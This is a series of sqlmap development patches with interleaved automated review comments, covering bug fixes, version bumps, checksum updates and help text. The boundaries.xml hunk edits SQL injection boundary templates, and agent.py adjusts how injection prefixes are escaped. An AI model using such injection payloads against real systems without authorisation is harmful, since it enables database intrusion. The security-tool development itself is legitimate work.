@@ -1089,7 +1089,7 @@ def whereQuery(self, query): if conf.dumpWhere and query: prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") - if "%s)" % conf.tbl.upper() in prefix.upper(): + if conf.tbl and "%s)" % conf.tbl.upper() in prefix.upper(): prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) elif re.search(r"(?i)\bWHERE\b", prefix): prefix += " AND %s" % conf.dumpWhere diff --git a/lib/core/settings.py b/lib/core/settings.py index d4c4f3d9f0a..8486b1ce692 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.10" +VERSION = "1.2.10.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 777e9baeded..01dc26cff1b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py +effd6e6a07b13fd8b3803ed4b89b06e2 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py 11448f59efbfdceff2437239e36d9dc5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 
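Review bot: The `re.sub` on the line after the changed condition passes `"%s WHERE %s)" % (conf.tbl, conf.dumpWhere)` as a replacement template, so a backslash in the user-supplied WHERE text or table name is interpreted as a regex replacement escape instead of being copied literally; `re.escape` protects only the pattern side. Passing a callable sidesteps template processing: `prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), lambda _: "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)`. The added `conf.tbl and` guard itself correctly avoids calling `.upper()` on an unset table name. `whereQuery` continues outside the hunk.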
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d6947d662df4d4bc9c33012a98a5fbc8 lib/core/settings.py +0ad6a2aebce990c7d4a1dd717ad3908a lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From f2b4dc3ffc634080e9420e264fdd6155911f2ea1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 8 Oct 2018 23:34:55 +0200 Subject: [PATCH 317/428] Fixes #3275 --- lib/controller/controller.py | 21 +++++++++++++-------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 16 insertions(+), 11 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index ad12620c7e7..16395be1c54 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -56,6 +56,7 @@ from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSkipTargetException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapValueException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import ASP_NET_CONTROL_REGEX 
@@ -243,16 +244,20 @@ def _saveToResultsFile(): results[key].extend(injection.data.keys()) - for key, value in results.items(): - place, parameter, notes = key - line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep) - conf.resultsFP.write(line) + try: + for key, value in results.items(): + place, parameter, notes = key + line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(techniques[_][0].upper() for _ in sorted(value)), notes, os.linesep) + conf.resultsFP.write(line) - if not results: - line = "%s,,,,%s" % (conf.url, os.linesep) - conf.resultsFP.write(line) + if not results: + line = "%s,,,,%s" % (conf.url, os.linesep) + conf.resultsFP.write(line) - conf.resultsFP.flush() + conf.resultsFP.flush() + except IOError, ex: + errMsg = "unable to write to the results file '%s' ('%s'). " % (conf.resultsFilename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) @stackedmethod def start(): diff --git a/lib/core/settings.py b/lib/core/settings.py index 8486b1ce692..927437b9bdd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.11" +VERSION = "1.2.10.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 01dc26cff1b..9a0c3e84350 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
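Review bot: The new error message `"unable to write to the results file '%s' ('%s'). "` ends with a period and a trailing space, which looks like a continuation that was never appended; `errMsg = "unable to write to the results file '%s' ('%s')" % (conf.resultsFilename, getSafeExString(ex))` reads cleanly on its own. Since the `except IOError` wraps the whole loop, a write failing mid-loop leaves a partially written line behind; a short comment above the `try:` noting that the results file may be truncated at the failing record helps whoever reads the raised `SqlmapSystemException`. `_saveToResultsFile` starts outside the hunk.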
@@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 61b66a7c30eb43c6b99ad57e4a8b5b22 lib/controller/checks.py -c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py +d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py effd6e6a07b13fd8b3803ed4b89b06e2 lib/core/agent.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0ad6a2aebce990c7d4a1dd717ad3908a lib/core/settings.py +fe0cffe5cf3eb9de96697f8ba3f0f297 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From e005ba3f773f4f27eb8eaa48624be336dba2a11a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 11 Oct 2018 23:59:09 +0200 Subject: [PATCH 318/428] Minor patch --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/boundaries.xml | 13 ++----------- 3 files changed, 5 insertions(+), 14 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 927437b9bdd..da315543715 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.12" +VERSION = "1.2.10.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9a0c3e84350..bd4e3b7241c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fe0cffe5cf3eb9de96697f8ba3f0f297 lib/core/settings.py +d3595e4cbdf8fa81c648a8caa339a444 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py @@ -468,7 +468,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml -3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml +385570003bf7d84f2502191eae8268c6 xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 857551e6bbe..7317fdaf055 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -383,7 +383,7 @@ Formats: 9 1 2 - '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] )||' @@ -392,19 +392,10 @@ Formats: 9 1 2 - '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] )||' - - 5 - 9 - 1 - 1 - '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] - )+' - - 5 9 From 5efe3228f861fa852c67a91060ca2c912ea3ec18 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Fri, 12 Oct 2018 00:16:42 +0200 Subject: [PATCH 319/428] Patch related to the #3282 --- lib/core/agent.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 8971ab0f4b3..423f66bd7bb 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -246,6 +246,9 @@ def prefixQuery(self, expression, prefix=None, where=None, clause=None): else: query = kb.injection.prefix or prefix or "" + if "SELECT '[RANDSTR]'" in query: # escaping of pre-WHERE prefixes + query = query.replace("'[RANDSTR]'", unescaper.escape(randomStr(), quote=False)) + if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('): query += " " diff --git a/lib/core/settings.py b/lib/core/settings.py index da315543715..025ee75c294 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.13" +VERSION = "1.2.10.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bd4e3b7241c..d777a525a1d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -27,7 +27,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -effd6e6a07b13fd8b3803ed4b89b06e2 lib/core/agent.py +6f9bc9a98821572b68819b8f12de6b59 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py 11448f59efbfdceff2437239e36d9dc5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d3595e4cbdf8fa81c648a8caa339a444 lib/core/settings.py +2e35f0241f73d87a34eb070faa227244 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 880d4384183692c2d8bccbc9c2f89619a24a6332 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 12 Oct 2018 00:29:43 +0200 Subject: [PATCH 320/428] Fixes #3284 --- lib/controller/checks.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 211ae5c8f71..fac6027e456 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1355,9 +1355,11 @@ def checkWaf(): value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) pushValue(kb.redirectChoice) + pushValue(kb.resendPostOnRedirect) pushValue(conf.timeout) kb.redirectChoice = REDIRECTION.YES + kb.resendPostOnRedirect = False conf.timeout = IDS_WAF_CHECK_TIMEOUT try: @@ -1368,6 +1370,7 @@ def checkWaf(): kb.matchRatio = None conf.timeout = popValue() + kb.resendPostOnRedirect = popValue() kb.redirectChoice = popValue() if retVal: 
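Review bot: The restore of `kb.resendPostOnRedirect` in the second hunk, together with the neighbouring `conf.timeout` and `kb.redirectChoice` pops, sits after the `try:` opened in the first hunk, and from the visible lines it is not clear that it runs inside a `finally:`; if the request in the `try` raises past its handlers, all three values stay clobbered and the push/pop stack is left unbalanced. Moving the three `popValue()` assignments into a `finally:` block, keeping the current reverse order, makes the save/restore pairing hold on every exit path. The push order (`redirectChoice`, `resendPostOnRedirect`, `timeout`) does match the pop order as written. `checkWaf` continues outside both hunks.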
diff --git a/lib/core/settings.py b/lib/core/settings.py index 025ee75c294..79907ed1e83 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.14" +VERSION = "1.2.10.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d777a525a1d..93d570c5d3d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -23,7 +23,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -61b66a7c30eb43c6b99ad57e4a8b5b22 lib/controller/checks.py +51bd96b450cbfdbff8eea4801e7486ae lib/controller/checks.py d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2e35f0241f73d87a34eb070faa227244 lib/core/settings.py +ca4c50212724a4ea997265f419803db1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py From 6af127cb64915931b40bb8ee099513a1fcb7f70b Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Sun, 14 Oct 2018 22:17:10 +0200 Subject: [PATCH 321/428] Fixes #3286 --- lib/core/settings.py | 2 +- lib/core/threads.py | 2 +- sqlmap.py | 14 +++++++------- txt/checksum.md5 | 6 +++--- 4 files changed, 12 insertions(+), 12 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 79907ed1e83..36642d02c39 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.15" +VERSION = "1.2.10.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/threads.py b/lib/core/threads.py index c6588dd1101..5d8ea0edc81 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -92,7 +92,7 @@ def exceptionHandledFunction(threadFunction, silent=False): kb.threadException = True raise except Exception, ex: - if not silent: + if not silent and kb.get("threadContinue"): logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) if conf.get("verbose") > 1: diff --git a/sqlmap.py b/sqlmap.py index 7085f59edd8..3f749d23fbd 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -384,13 +384,6 @@ def main(): with openFile(conf.harFile, "w+b") as f: json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': ')) - if cmdLineOptions.get("sqlmapShell"): - cmdLineOptions.clear() - conf.clear() - kb.clear() - conf.disableBanner = True - main() - if conf.get("api"): try: conf.databaseCursor.disconnect() 
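Review bot: With `if not silent and kb.get("threadContinue"):` in the threads.py hunk, an exception raised after `threadContinue` has been cleared is no longer reported at all, so an error during thread wind-down disappears without a trace. Keeping a debug-level record for that case, e.g. `logger.debug("thread %s: %s" % (threading.currentThread().getName(), ex.message))` in an `elif not silent:` branch, preserves the cause without the shutdown noise. Whether the following `if conf.get("verbose") > 1:` traceback block is still reached under the new condition is not visible here and is worth confirming. `exceptionHandledFunction` continues outside the hunk.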
@@ -405,6 +398,13 @@ def main(): _ = time.time() while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) + + if cmdLineOptions.get("sqlmapShell"): + cmdLineOptions.clear() + conf.clear() + kb.clear() + conf.disableBanner = True + main() except KeyboardInterrupt: pass finally: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 93d570c5d3d..bdddb541eac 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,12 +49,12 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ca4c50212724a4ea997265f419803db1 lib/core/settings.py +bd070cf6683de2f9ed462d35eba1ead5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 62bc180e3e828949ffb342a8f756c183 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py -29efb66f3c444c09d29925cf552851cd lib/core/threads.py +cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -c6f90d321b9ec7bff5b3be15cd4e19d8 sqlmap.py +d94547672ec6dbc4c2adffbf62bd36d4 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 465a1e1a86e88bd8df9f4a1b9554f2570a803084 Mon Sep 17 00:00:00 2001 
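Review bot: The relocated `main()` call for `sqlmapShell` re-enters `main()` from inside its own `try` block, so each shell command adds another `main` frame to the stack and keeps the outer `finally:` pending until the process exits; the move only changes when that recursion happens, not that it happens. If the shell is meant to be long-lived, returning a restart flag from `main()` and looping in the `if __name__ == "__main__":` caller avoids the unbounded nesting. `conf.disableBanner = True` is assigned after `conf.clear()`, so it does survive the reset as intended. `main` continues outside the hunk.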
From: Miroslav Stampar Date: Mon, 15 Oct 2018 00:53:26 +0200 Subject: [PATCH 322/428] Minor update --- lib/core/settings.py | 2 +- lib/core/target.py | 9 ++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 36642d02c39..4185d512021 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.16" +VERSION = "1.2.10.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index cb3f755a621..66f237dc87b 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -44,6 +44,7 @@ from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapMissingPrivileges +from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException from lib.core.option import _setDBMS @@ -466,7 +467,13 @@ def _resumeDBMS(): value = hashDBRetrieve(HASHDB_KEYS.DBMS) if not value: - return + if conf.offline: + errMsg = "unable to continue in offline mode " + errMsg += "because of lack of usable " + errMsg += "session data" + raise SqlmapNoneDataException(errMsg) + else: + return dbms = value.lower() dbmsVersion = [UNKNOWN_DBMS_VERSION] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bdddb541eac..da805c11a58 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
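Review bot: The new `if conf.offline: ... raise SqlmapNoneDataException(errMsg)` followed by `else: return` in the target.py hunk carries a redundant `else`; since the branch raises, leaving a bare `return` at the outer level is the usual guard-clause form. The message can also be a single statement, `errMsg = "unable to continue in offline mode because of lack of usable session data"`, rather than three concatenations. `_resumeDBMS` starts outside the hunk.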
@@ -49,10 +49,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bd070cf6683de2f9ed462d35eba1ead5 lib/core/settings.py +f9c54a74954157624dafa19b563d92b6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -62bc180e3e828949ffb342a8f756c183 lib/core/target.py +47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 1f2bdf5a3d67845e91f5cc149aa4d80bf3081021 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Oct 2018 00:56:23 +0200 Subject: [PATCH 323/428] Trivial message update --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 2 +- sqlmap.conf | 2 +- txt/checksum.md5 | 4 ++-- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4185d512021..263d5bfe0df 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.17" +VERSION = "1.2.10.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 86faefd9b56..8cc577e66c1 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py 
@@ -626,7 +626,7 @@ def cmdLineParser(argv=None): help="Clean up the DBMS from sqlmap specific UDF and tables") miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true", - help="Check for missing (non-core) sqlmap dependencies") + help="Check for missing (optional) sqlmap dependencies") miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true", help="Disable console output coloring") diff --git a/sqlmap.conf b/sqlmap.conf index b81fa51f47b..dcbe92af381 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -761,7 +761,7 @@ checkPayload = False # Valid: True or False cleanup = False -# Check for missing (non-core) sqlmap dependencies. +# Check for missing (optional) sqlmap dependencies. # Valid: True or False dependencies = False diff --git a/txt/checksum.md5 b/txt/checksum.md5 index da805c11a58..a7c7b5f06e8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f9c54a74954157624dafa19b563d92b6 lib/core/settings.py +fb1892f8a3902907dcd6c75f58dd80c1 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -60,7 +60,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -4296aee13e84a7394f2329dc7ea542ef lib/parse/cmdline.py +6458f20d6ebe20fb45a79a09c2874d33 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 9f6e04b14106c90dd08d6d1bec59268eaabe8e7d Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Mon, 15 Oct 2018 02:15:05 +0200 Subject: [PATCH 324/428] Minor update of help text --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 12 ++++++------ sqlmap.conf | 12 ++++++------ txt/checksum.md5 | 4 ++-- 4 files changed, 15 insertions(+), 15 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 263d5bfe0df..b1b8466fab8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.18" +VERSION = "1.2.10.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 8cc577e66c1..2c867b88e35 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -99,16 +99,16 @@ def cmdLineParser(argv=None): help="Force usage of given HTTP method (e.g. PUT)") request.add_option("--data", dest="data", - help="Data string to be sent through POST") + help="Data string to be sent through POST (e.g. \"id=1\")") request.add_option("--param-del", dest="paramDel", - help="Character used for splitting parameter values") + help="Character used for splitting parameter values (e.g. &)") request.add_option("--cookie", dest="cookie", - help="HTTP Cookie header value") + help="HTTP Cookie header value (e.g. \"PHPSESSID=a8d127e..\")") request.add_option("--cookie-del", dest="cookieDel", - help="Character used for splitting cookie values") + help="Character used for splitting cookie values (e.g. ;)") request.add_option("--load-cookies", dest="loadCookies", help="File containing cookies in 